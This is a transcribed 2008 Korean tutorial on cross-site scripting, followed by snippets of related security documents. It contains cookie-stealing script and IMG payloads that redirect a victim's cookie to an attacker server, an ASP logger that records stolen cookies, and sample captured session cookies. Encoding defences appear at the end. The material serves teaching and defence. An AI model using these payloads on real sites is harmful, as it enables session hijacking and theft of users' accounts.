Microsoft Word - CrossSiteScripting[XSS].docx

Size: px
Start display at page:

Download "Microsoft Word - CrossSiteScripting[XSS].docx"

Transcription

1 1 Education Giehong.E abstract - 영리를목적으로한곳에서의불법적인배포는금지합니다. - 문서의내용은임의의가상테스트를대상으로한 OWASP10 의기본적인내용들이며교육을위해만들어진문서입니다. - 비인가받은악의적인행동은불법이며법적책임또한당사자에게있습니다 Copyright@2008 All Rights Reserved by ghlee 페이지 1

2 2 A Table of Contents concept XSS Test 시나리오 #1 시나리오 #2 XSS 대응방안 Reference Copyright@2008 All Rights Reserved by ghlee 페이지 2

3 3 concept Cross Site Scripting은사용자에게공격목적의악의적인웹컨텐츠를보내는공격방법이다. 공격자가사용자에게보내는악의적인웹컨텐츠는 URL에포함된스크립트코드이거나보안에취약한웹사이트의폼필드에입력된스크립트코드가될수있다. 일반적으로 HTML 코드에의해미리정의된위치에평범한텍스트형태로브라우저상에표현되지만 HTML은그런평범한텍스트뿐만아니라다른다양한컨텐츠를표현하고 Client Side Script Code 를포함할수있다. Client측 Script는 Sendbox 로알려진제한된환경에서동작하기때문에대부분의경우 local에는악영향을미치지않는다. Cross Site Scripting 공격이의미하는바는정확히어느한사용자가입력한스크립트코드를다른사용자의컴퓨터에서실행시키는것이다. 즉 XSS의가장큰특징인 Server가아닌 Client를공격하는것이다. Sendbox 덕분에사용자는심각한침해로부터보호받을수있지만 Client Script Code는코드에명시된파일이나로컬리소스에접근해서자신의정해진동작을수행할수있어야한다. 바로이점이위험을내포하고있는것이다실행되는스크립트코드는현재의웹페이지에포함된모든정보에접근할수있으며악의적인의도를가진공격자가 XSS를이용해서사용자의쿠키를훔쳐낼수있고마치그사용자인것처럼행세할수도있으며다른악의적인사이트로사용자를이동시키거나교묘히웹페이지내용을조작해서사용자가개인정보를입력하게할수도있음을의미한다. <script>document.images[29].src=" ogo.gif"</script> 이스크립트를웹페이지에서로드시키면다음과같이 29 번째이미지가변경된것을볼수있다. All Rights Reserved by ghlee 페이지 3

4 4 XSS공격은주로사용자의 SessionID 나 Cookie값을훔쳐내어권한을훔쳐내는기법이사용되며. 본문서에서는 Session 과 Cookie를따로설명하지는않고 Cookie Stealing 에서자세히다루겠다. XSS 공격은저장 (Stored)XSS 와반사 (Reflected)XSS 이렇게크게두가지가있다. 우선첫번째로는저장 (Stored)XSS 에대해살펴보겠다. 저장XSS 는공격자가 XSS 보안취약점공격을위해가장많이살펴보는곳이같은사이트를방문하는다른사용자들에게보이는데이터를입력하는부분이다. 즉메시지입력부분, 방명록, 댓글, 등을남기기기위해사용자가입력하는부분이다. 공격자는이러한 FORM 필드부분에악의적인스크립트를저장하고후에어떤사용자가해당사이트의같은곳을방문하면해당스크립트가웹페이지에서로드면서코드가실행되는것이다. 두번째로는반사 (Reflected)XSSS 공격이며반사 (Reflected)XSS 공격은 URL의 CGI 인자에스크립트코드를삽입하는것이다. 공격자가이메일을이용해어떤웹페이지링크를보내고그링크를전달받은사용자가링크를클릭하면그링크에대한웹페이지가로드된다. 그때웹페이지에대한링크 URL에삽입된스크립트코드가실행되면서웹페이지의내용이변경된다. All Rights Reserved by ghlee 페이지 4

5 5 공격대상사용자가웹사이트에입력한데이터를해당웹사이트를방문한다른사용자가볼수있는경우에이공격을적용할수있다. XSS 공격에취약한부분이발견되었더라도다른사용자가그부분을접하지않으면아무런소용이없다. 당연한이야기이지만이유는간단하다 XSS공격의특징은 ServerSideScript 가아니라 Client SideScript 이기때문이다. 공격수행방법 HTML은웹페이지에스크립트코드를삽입할수있는여러가지메커니즘을제공하며그중에서도가장명확한것이 <script> </script> 태그를이용하는것이다. 우선공격할 FORM 필드에 <script>alert( XSS Attack )</script> 를이용하여다음과같이메시지박스가뜬다면 XSS 공격에취약한것으로본다. HTML 태그는스크립트삽입에취약하다. 예를들면 IMG 태그가그런경우라고할수있다. <img src= path/image.gif> 위의 img 태그를다음과같이수정할수있다. <img src=javascript:alert( XSS alert! )> HTML 태그전반적인문제들이있으며 STYLE, SRC, HREF, TYPE 속성을지원하는태그들이대부분마찬가지이기때문에 HTML 태그자체를필터링하는것은어려운일이다. 하지만공격자는단지메시지창을띄우는것이아니라공격자는세션 ID를포함하는중요정보를얻고자하며 <script>alert(document.cookie)</script> 를이용하여쿠키의값을보여줄수있는메시지박스를띄우도록한다. 하지만이런쿠키정보는공격자입장에서는아무런도움이되지못한다. 공격자에게도움이되려면원격으로이쿠키정보를획득할수있어야하며획득할수있는방법도여러가지가존재한다. 실제적인공격방법은시나리오를통해서알아보도록하겠다. All Rights Reserved by ghlee 페이지 5

6 6 XSS 입력과정 / 공격절차 1. 공격자가 XSS 취약점이존재하는서버에악성스크립트를게시 2. 관리자또는사용자가로그인을실시하고토큰 (Cookie 또는 SessionID) 생성 3. 공격자가게시한악성스크립트를보거나클릭 4. 관리자또는사용자의토큰이공격자에게전송 5. 공격자가해당토큰을이용 / 다른사용자의권한을가장또는소유 XSS를유발시킬수있는대표적인코드이다. <script>... </script> <img src = javascript:... /> <div style = background-image:url( javascript...) /> <embed>... </embed> <Iframe>... </Iframe> Cross Site Scripting 의효과시스템의특정명령을실행 / SessionID & Cookie Stealing XSS 의 Filtering 우회방법들은 참조하기바란다. Copyright@2008 All Rights Reserved by ghlee 페이지 6

7 7 XSS Test 시나리오 #1 자신의웹서버에희생자 Cookie 남기기 가장일반적이며보편적인공격방법이다. 공격자는악성스크립트를 XSS 취약점을가지고있는게시판에스크립트를작성하여공격자사이트의애플리케이션으로이동시켜 Cookie값을수집할수있다. 게시판에다음과같은스크립트를 HTML 형식으로등록한다. <script>document.location=' 공격자의웹서버에는다음과같은어플리케이션이있어야한다. 코드의내용은상당히간단하다 request객체로 Cookie을인자로하여그값을파일에쓰고희생자가눈치채지못하게다시그게시판으로 redirect 한다. All Rights Reserved by ghlee 페이지 7

8 8 <% cookie=request("cookie") ' 쿠키값받기 Set fs = Server.CreateObject("Scripting.FileSystemObject") if fs.fileexists("c:\xss\xss.txt") then else fs.createtextfile ("c:\xss\xss.txt"), true end if Set objfile = fs.opentextfile("c:\xss\xss.txt",8) ' 파일쓰기 objfile.writeline(" ") objfile.writeline(cookie) objfile.close response.redirect(" %> C:\xss\xss.txt 파일이생기고 Cookie 값이등록이된다. C:\xss\xss.txt 파일을확인하면다음과같은결과가발생한다. oyesorder=oyes_order= ; csig_oyesorder=yfqkda657nywjohrca5i1w; ASPSESSIONIDCQRTDADQ=JEIFICPADIOAHHFHIHNLLHFC; csig_aspsessionidcqrtdadq=j3d5r50hpkiot7xdpz9ljq 쿠키값을얻었고쿠키값안에세션검증이이루어지지않았다면희생자계정으로로그인할수있으며로그인이가능하다는이야기는사용자의정보를전부획득할수있다는결과를가져온다. Copyright@2008 All Rights Reserved by ghlee 페이지 8

9 9 XSS Test 시나리오 #2 OO 포털 XSS 테스트 OO 포털 XSS 가능한부분과 XSS를할수있는다양한방법을생각해보고시나리오 #1 같은방식으로진행을하겠다. 하지만게시판에 <script> 태그의방어정책이수립되어있음을먼저생각해야한다. 첫번째방법으로단지 <script> 태그만막혀있으므로 HTML코드에 <script> 태그를삽입하여공격하는방식이며두번째방법은첨부파일을통한공격방법이다. 두번째공격은독자스스로가실습을해보도록한다. HTML 태그중 IMG 라는이미지삽입태그를써서공격을하였다. <IMG SRC=javascript:document.location=' 희생자가메일을읽으면다음과같은화면이나타날것이고이화면을본순간희생자의쿠키값은공격자의웹서버에남게된다. All Rights Reserved by ghlee 페이지 9

10 10 공격자의 C:\xss\xss.txt 파일에는쿠키값이남게된다. 공격자는훔친쿠키로로그인해서희생자의개인정보를알아낼수있다. XSS 대응방안 기술적인 XSS 방어방법을설명하기이전에어떤것을어떻게해야하는지부터설명을하겠다. 스크립트코드를실행하기위한대표적인코드는 <script> </script> 태그가있다. 하지만이태그이외에도 HTML, 자바스크립트, VB스크립트, 액티브X, FLASH 등과같이다양한스크립트언어나삽입기술이 XSS 공격에이용될수있다. 이렇게때문에허용되어서는안되는데이터를필터링하는방법보다는허용가능한데이터만필터링하는편이낫다. 가장확실하고쉬운방법은데이터가코드로해석되는것을방지하는것인데즉 HTML에서모든코드는 < > 안에존재한다. 생각해보면모든각괄호를해당인코딩값으로교체하면데이터가코드로잘못인식되는경우는발생하지않는다라는이야기가된다. 필자가생각해본방어방법중하나는 HTML 삽입부분을없애는것이다. 그렇다면서비스측면에측볼때상당히성능이떨어진다고생각하지만 HTML 툴을쓰는것이가장효율적이지않나하는생각을한다. 물론이미지삽입공격이나첨부파일형식의공격은못막겠지만말이다. 평소생각하고있었던것을이문서를통해말하는바이다. All Rights Reserved by ghlee 페이지 10

11 11 우선 XSS 공격이되는게시판에테스트를해보고 HTML 인코딩을적용시키는예를살펴보자다음과같이스크립트가적용되는것을볼수있다. contents = Server.HTMLEncode(Request("contents")) CONTENTS 부분을 HTML Encode 시킨다면다음과같이 <script> 태그가적용이안될것이다. 이방법의문제점은 CONTETS 부분에 HTML 태그전부를인코딩하는결과가발생된다. content = ConvertTohtml(content) content = Replace(content,"'","''") content = replace(content,"&","&") content = replace(content,">",">") content = replace(content,"<","<") Replace 구문을쓰게되면해당태그를필터링시킬수있다. Copyright@2008 All Rights Reserved by ghlee 페이지 11

12 12 Reference 황순일, 김광진.(2005) 웹해킹패턴과대응 사이텍미디어 마이크엔드류스 / 제임스A. 휘태커.(2006) How to Break Web Software : Funtional and Security Testing of Web Applications and Web Services Pearson Copyright@2008 All Rights Reserved by ghlee 페이지 12

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여

More information

로거 자료실

로거 자료실 redirection 매뉴얼 ( 개발자용 ) V1.5 Copyright 2002-2014 BizSpring Inc. All Rights Reserved. 본문서에대한저작권은 비즈스프링 에있습니다. - 1 - 목차 01 HTTP 표준 redirect 사용... 3 1.1 HTTP 표준 redirect 예시... 3 1.2 redirect 현상이여러번일어날경우예시...

More information

PowerPoint Template

PowerPoint Template 설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet

More information

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc 분석보고서 이동현 (dhclub20@naver.com) SK Infosec Co., Inc MSS 사업본부침해대응팀모의해킹파트 Table of Contents 1. 개요... 3 1.1. 배경... 3 1.2. 목적... 3 2. 공격분석... 4 2.1. Cookie Injection... 4 2.2. Cookie Injection의발생원인... 5 2.3.

More information

PowerPoint Presentation

PowerPoint Presentation WordPress 를이용한웹사이트만들기 2015 년 한지웅 WordPress 를이용한웹사이트만들기 Day 1 Day 2 Day 3 Day 4 Day 5 1. 웹사이트제작기초 HTLM 기본 CSS 기본 WordPress 개론 ( 웹사이트구축툴 ) 2. 웹호스팅 / 웹사이트구축 웹호스팅업체선택 cpanel 설정 WordPress 설치 3. WordPress 기초활용

More information

(Microsoft Word - \301\266\301\326\272\300_XSS.docx)

(Microsoft Word - \301\266\301\326\272\300_XSS.docx) XSS(Cross Site Scripting) 1. XSS 란무엇인가 XSS 란 Cross Site Scripting 의약자 (CSS 라고도불리기도하나 Cascading Style Sheets 와혼용되어일반적으로 XSS 를많이사용한다.) 로 Web 보안취약점중하나이다. 이러한 XSS 는인터넷이생겨나고활성화되기전, 홈페이지소개및단지정보를제공하는정적인페이지에서인터넷이활성화된현재,

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 SECUINSIDE 2017 Bypassing Web Browser Security Policies DongHyun Kim (hackpupu) Security Researcher at i2sec Korea University Graduate School Agenda - Me? - Abstract - What is HTTP Secure Header? - What

More information

PowerPoint Template

PowerPoint Template JavaScript 회원정보 입력양식만들기 HTML & JavaScript Contents 1. Form 객체 2. 일반적인입력양식 3. 선택입력양식 4. 회원정보입력양식만들기 2 Form 객체 Form 객체 입력양식의틀이되는 태그에접근할수있도록지원 Document 객체의하위에위치 속성들은모두 태그의속성들의정보에관련된것

More information

var answer = confirm(" 확인이나취소를누르세요."); // 확인창은사용자의의사를묻는데사용합니다. if(answer == true){ document.write(" 확인을눌렀습니다."); else { document.write(" 취소를눌렀습니다.");

var answer = confirm( 확인이나취소를누르세요.); // 확인창은사용자의의사를묻는데사용합니다. if(answer == true){ document.write( 확인을눌렀습니다.); else { document.write( 취소를눌렀습니다.); 자바스크립트 (JavaScript) - HTML 은사용자에게인터페이스 (interface) 를제공하는언어 - 자바스크립트는서버로데이터를전송하지않고서할수있는데이터처리를수행한다. - 자바스크립트는 HTML 나 JSP 에서작성할수있고 ( 내부스크립트 ), 별도의파일로도작성이가능하다 ( 외 부스크립트 ). - 내부스크립트 - 외부스크립트

More information

제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호

제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호 제이쿼리 () 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호 CSS와마찬가지로, 문서에존재하는여러엘리먼트를접근할수있다. 엘리먼트접근방법 $( 엘리먼트 ) : 일반적인접근방법

More information

설명 Description 상세정보 네이버에서운영하는서비스중하나인쥬니어네이버 ( 이하쥬니버 ) 에서는쥬니버서비스와 관련하여도움을주기위한 [ 그림 1] 과같은플래시애플리케이션이서비스되고있다.[2] [ 그림 1] 쥬니어네이버에서서비스중인쥬니버도우미플래시애플리케이션 해당플래

설명 Description 상세정보 네이버에서운영하는서비스중하나인쥬니어네이버 ( 이하쥬니버 ) 에서는쥬니버서비스와 관련하여도움을주기위한 [ 그림 1] 과같은플래시애플리케이션이서비스되고있다.[2] [ 그림 1] 쥬니어네이버에서서비스중인쥬니버도우미플래시애플리케이션 해당플래 네이버플래시애플리케이션 XSS 취약점분석보고서 작성일 2013/04/24 작성자 카이스트시스템보안연구실 홍현욱 (karmatia@kaist.ac.kr) 최현우 (zemisolsol@kaist.ac.kr) 김용대 (yongdaek@kaist.ac.kr) 요약 플래시애플리케이션은보고서작성일을기준으로전체웹사이트의 19.5% 가사용하고있으며 [5] 이러한플래시애플리케이션을작동시켜주는플래시플레이어는웹브라우저에기본적으로설치되어있거나웹브라우저에서웹사이트를이용하는사용자들에게자동으로설치하도록유도한다.

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Web server porting 2 Jo, Heeseung Web 을이용한 LED 제어 Web 을이용한 LED 제어프로그램 web 에서데이터를전송받아타겟보드의 LED 를조작하는프로그램을작성하기위해다음과같은소스파일을생성 2 Web 을이용한 LED 제어 LED 제어프로그램작성 8bitled.html 파일을작성 root@ubuntu:/working/web# vi

More information

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770> 개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000

More information

Cookie Spoofing.hwp

Cookie Spoofing.hwp Cookie Spoofing&Sniffing By Maxoverpro[max]( 장상근) maxoverpro@empal.com http://www.maxoverpro.org 1. 서론 이문서는 Cookie Spoofing 과 Sniffing 에대해정석적인방법을이야기하도록하며또 한어느특정곳의취약점을설명하지않고직접제작한예제를가지고 Cookie Spoofing 과

More information

FD¾ØÅÍÇÁ¶óÀÌÁî(Àå¹Ù²Þ)-ÀÛ¾÷Áß

FD¾ØÅÍÇÁ¶óÀÌÁî(Àå¹Ù²Þ)-ÀÛ¾÷Áß Copyright (c) 1999-2002 FINAL DATA INC. All right reserved Table of Contents 6 Enterprise for Windows 7 8 Enterprise for Windows 10 Enterprise for Windows 11 12 Enterprise for Windows 13 14 Enterprise

More information

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp");

다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) <% RequestDispatcher dispatcher = request.getrequestdispatcher( 실행할페이지.jsp); 다른 JSP 페이지호출 forward() 메서드 - 하나의 JSP 페이지실행이끝나고다른 JSP 페이지를호출할때사용한다. 예 ) RequestDispatcher dispatcher = request.getrequestdispatcher(" 실행할페이지.jsp"); dispatcher.forward(request, response); - 위의예에서와같이 RequestDispatcher

More information

FOCUS Ⅰ. 개요 1. 사이버공격동향과거 10년전에비해사이버공격의방법은광범위하고지능적이며, 미치는범위는급격히확대되고있다. 과거개별시스템에존재하는취약점에대한스크립트키디정도의공격에서, 이제조직화된범죄단체또는국가가후원하는조직에서서버뿐만아니라클라이언트프로그램취약점, 스피어

FOCUS Ⅰ. 개요 1. 사이버공격동향과거 10년전에비해사이버공격의방법은광범위하고지능적이며, 미치는범위는급격히확대되고있다. 과거개별시스템에존재하는취약점에대한스크립트키디정도의공격에서, 이제조직화된범죄단체또는국가가후원하는조직에서서버뿐만아니라클라이언트프로그램취약점, 스피어 FOCUS 4 크로스사이트스크립팅 (XSS) 공격종류및대응방법 FOCUS 성윤기 과거 10년전에비해사이버공격의방법은지능적이고, 미치는범위는급격히확대되고있다. 단일취약점에대한스크립트키디수준의공격에서, 이제조직화된범죄단체또는국가가후원하는조직에서서버뿐만아니라클라이언트취약점, 스피어피싱공격등여러취약점공격을자동화하는악성코드를배포하여대규모감염을유도하는공격등다양한플랫폼을대상으로복합적인형태의공격을통해사이버공격자가원하는중요정보나금전을훔치는공격으로발전하고있다.

More information

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진 WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진 해킹의 종류 웹해킹 네트워크 해킹 시스템(OS)해킹 웹해킹 기법 SQL INJECTION HTML INJECTION Cross Site Scripting HEADER INJECTION 웹해킹 기법 업로드 취약점 다운로드 취약점 INJECTION 나는 사람입니다. 나는

More information

제목 레이아웃

제목 레이아웃 웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya

More information

*금안1512-01-도비라및목차1~9

*금안1512-01-도비라및목차1~9 ISSN 1975-667 215. 12 215. 12 6 5 4 3 2 1 6 5 4 3 2 1 3 145 14 135 13 13 143. 14.7 1.4 9.2 1 7 45 4 35 41.4 85 76.9 76.8 3 7 8 75 125 4 4 1 25 8 6 4 2 2 15 1 5 15 15 36 35.3 36 14 13 12 11 14

More information

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환

취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환 취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit 2012-07-19 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Simple Web Server 취약점... 2 2.1. Simple Web Server 취약점개요... 2 2.2. Simple

More information

C H A P T E R 2

C H A P T E R 2 C H A P T E R 2 Foundations of Ajax Chapter 2 1 32 var xmlhttp; function createxmlhttprequest() { if(window.activexobject) { xmlhttp = new ActiveXObject( Micr else if(window.xmlhttprequest) { xmlhttp =

More information

歯박지원-구운몽.PDF

歯박지원-구운몽.PDF wwwnovel21com (c) Copyright Joeun Community All Rights Reserved ,,,,,,,,,,,, 1 2 ( ) ( ),,, ( ) ( ) ( ), ( ) ( ) ( ) " ( ) 3 ( ) " ( ) " ( ) ( ) ( ) " ( ) " ",,, ( ) ", ( ), 4 ( ), " ( ), () ",,,, 5 (

More information

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3

Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Poison null byte Excuse the ads! We need some help to keep our site up. List 1 Conditions 2 Exploit plan 2.1 chunksize(p)!= prev_size (next_chunk(p) 3 Example 3.1 Files 3.2 Source code 3.3 Exploit flow

More information

*금안14(10)01-도비라및목차1~12

*금안14(10)01-도비라및목차1~12 ISSN 1975-667 21. 1 21. 1 3 1 8 6 2 1 8 6 2 15 1 13 12 11 1 15 12 9 6 3 36 32 28 2 75 85 83 81 79 77 5 1 8 6 1 8 6 1 8 25 2 2 2 6 15 1 2-2 5-5 3 2 3 2 1 1-1 -1-2 -2 6 1 13 12 1 8 6 16 12 2.

More information

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름 EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection

More information

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라. 기술문서 14. 11. 10. 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 dokymania@naver.com I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라. Exploit 5 마. 피해 6 III. 결론 6 가. 권고사항 6 I. 소개 가. 역자 본문서는

More information

Javascript

Javascript 1. HTML 이란? HTML 은 Hyper Text Mark Up Language 의약자로예약되어있는각종태그라는명령어를이용하여웹페이지를작성할때사용하는언어입니다. 2. HTML 의기본구조 < 태그 > 내용 < 태그속성 = 변수 > 내용

More information

쉽게 풀어쓴 C 프로그래밍

쉽게 풀어쓴 C 프로그래밍 CHAPTER 13. HTML5 위치정보와드래그앤드롭 SVG SVG(Scalable Vector Graphics) 는 XML- 기반의벡터이미지포맷 웹에서벡터 - 기반의그래픽을정의하는데사용 1999 년부터 W3C 에의하여표준 SVG 의장점 SVG 그래픽은확대되거나크기가변경되어도품질이손상되지않는다. SVG 파일에서모든요소와속성은애니메이션이가능하다. SVG 이미지는어떤텍스트에디터로도생성하고편집할수있다.

More information

*2008년1월호진짜

*2008년1월호진짜 3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가

More information

< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770>

< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770> 악성코드유포지 경유지의공격코드와보안취약점 1. 개요 본고에서는인터넷침해사고대응지원센터에서자체개발 적용하고있는악성코드은닉사이트탐지프로그램에서 2006년 1월부터 3월까지탐지한사이트중 50개를대상으로공격코드및관련소프트웨어취약점을분석한다. 먼저 ( 그림 1) 에서악성코드유포와경유지를구분하고, 2005년이후게재되었던 인터넷침해사고동향및분석월보 관련기사를해당부분에적어보았다.

More information

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,

More information

게시판 스팸 실시간 차단 시스템

게시판 스팸 실시간 차단 시스템 오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP

More information

*금안 도비라및목차1~17

*금안 도비라및목차1~17 ISSN 1975-667 216. 6 금융안정보고서 216. 6 6 5 4 3 2 1 6 5 4 3 2 1 3 15 145 14 135 13 13 1 125 4 7 1 1 2 1 5 5 5 2 4 4 4 18 3 3 3 16 2 2 45 4 35 14 12 37.7 36.9.7-1.5 3-1 3 2 1 4 25 2 15 1 5-5

More information

<C4DAC0CEB7CEC4BF5F666F725044462E687770>

<C4DAC0CEB7CEC4BF5F666F725044462E687770> 코 인 로 커 dedicated to Akira Sendoh X Hanamichi Sakuragi and you 7 時 10 分 :: HASHEESH copyright c since 2004 HASHEESH. All Rights Reserved. 이 책의 저작권은 해쉬::HASHEESH 에게 있습니다. 모든 형태로의 무단 전재 및 복제를 금합니다. E-mail

More information

HTML5

HTML5 퀴즈 류관희 게임규칙 동적으로 HTML 요소생성 생성된 HTML 요소의화면배치및위치옮기기 퀴즈게임 국가명과수도명의짝맞추기 배열 ( 국가명, 수도명 ) 짝모두맞추면 => 동영상플레이 2 퀴즈게임 3 4 5 6 주요특징 배열 : 국가명과수도명저장 피드백 : 색상변경, 동영상재생 플레이 20쌍중에 4 쌍무작위로선택 글자 : 국가명과수도명 => 그림으로대치 7 사전준비항목

More information

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770> 웹하드서비스를통해생성된 Botnet 을이용한 DDoS 공격피해사례 2009. 12. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국인터넷침해대응센터 (KrCERT)] 를명시하여주시기바랍니다. - 1 - 1. 개요 최근발생하고있는 DDoS 사례들을분석해보면그방식들이점점지능화되고조직화되고있다는것을확인할수있다. 또한 DDoS 공격의목적도과거자기과시또는정치적인이유의단순한목적에서벗어나금전적이득을취하거나경쟁업체의영업을방해하기위한목적으로점차기업화되고있기도하다.

More information

<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F32C2F7BDC32E >

<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F32C2F7BDC32E > 6. ASP.NET ASP.NET 소개 ASP.NET 페이지및응용프로그램구조 Server Controls 데이터베이스와연동 8 장. 데이터베이스응용개발 (Page 20) 6.1 ASP.NET 소개 ASP.NET 동적웹응용프로그램을개발하기위한 MS 의웹기술 현재 ASP.NET 4.5까지출시.Net Framework 4.5 에포함 Visual Studio 2012

More information

Windows 8에서 BioStar 1 설치하기

Windows 8에서 BioStar 1 설치하기 / 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar

More information

PowerPoint 프레젠테이션

